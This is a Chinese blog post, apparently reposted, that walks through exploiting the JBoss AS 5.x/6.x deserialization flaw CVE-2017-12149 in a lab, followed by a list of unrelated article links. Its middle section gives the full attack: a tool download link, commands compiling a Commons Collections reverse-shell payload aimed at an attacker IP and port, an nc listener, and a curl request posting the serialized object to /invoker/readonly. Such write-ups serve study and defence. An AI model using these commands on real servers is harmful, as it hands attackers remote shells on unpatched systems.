博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
JBOSSAS 5.x/6.x 反序列化命令执行漏洞(CVE-2017-12149)
阅读量:4447 次
发布时间:2019-06-07

本文共 1163 字,大约阅读时间需要 3 分钟。


  本文主要记录一下JBOSSAS 5.x/6.x 反序列化命令执行漏洞的测试过程

仅供学习


  文中利用到漏洞环境由维护:

  靶机地址:192.168.1.102  服务端口:8080    

  测试机: 192.168.1.100

  搭建好环境,访问地址: 及 

  

  响应码500,证明漏洞存在。

  下载漏洞利用工具: http://scan.javasec.cn/java/JavaDeserH2HC.zip

  编译:(需要java环境)

javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java

  运行:

java -cp .:commons-collections-3.2.1.jar  ReverseShellCommonsCollectionsHashMap ip:port   //反弹shell的IP和端口
starnight:JavaDeserH2HC starnight$ javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.javastarnight:JavaDeserH2HC starnight$ java -cp .:commons-collections-3.2.1.jar  ReverseShellCommonsCollectionsHashMap 192.168.1.100:1337Saving serialized object in ReverseShellCommonsCollectionsHashMap.ser

  这样就会将序列化对象保存在ReverseShellCommonsCollectionsHashMap.ser中,用curl命令发送到Jboss服务地址。

  先在测试机运行nc命令,进入监听模式:

starnight:temp starnight$ nc -lvv 1337

  再打开另一个控制台,运行如下curl命令:

starnight:JavaDeserH2HC starnight$ curl -v http://192.168.1.102:8080/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser

  运行截图:

  左侧是获取到shell,并执行命令。右侧是用curl命令运行截图。

References

  

  

 

转载于:https://www.cnblogs.com/Hi-blog/p/7904443.html

你可能感兴趣的文章
js-20170609-运算符
查看>>
ALV弹出窗口   REU…
查看>>
算法笔记_065:分治法求逆序对(Java)
查看>>
CSS中关于字体大小的定义 em px rem pt %
查看>>
MSP430FLASH小结
查看>>
STM32 ADC转换时间
查看>>
kylin cube 构建过程
查看>>
结合实际业务场景聊一聊MVP模式的应用
查看>>
我爱 哐 哐 哐,我是哐人类!-【废话区】
查看>>
WinPE启动U盘的制作方法与软件下载(通用PE工具箱/老毛桃/大白菜WinPE)(转载)...
查看>>
行为型设计模式之5--中介者模式
查看>>
Android DevArt6:Android中IPC的六种方式
查看>>
oracle练习题
查看>>
PMP学习感想
查看>>
Zookeeper全解析——Paxos作为灵魂
查看>>
集合-强大的集合工具类:java.util.Collections中未包含的集合工具
查看>>
CSS清除浮动
查看>>
数据库基础-数据库常用命令总结
查看>>
java8 按对象属性值排序
查看>>
[转帖]nvidia nvlink互联与nvswitch介绍
查看>>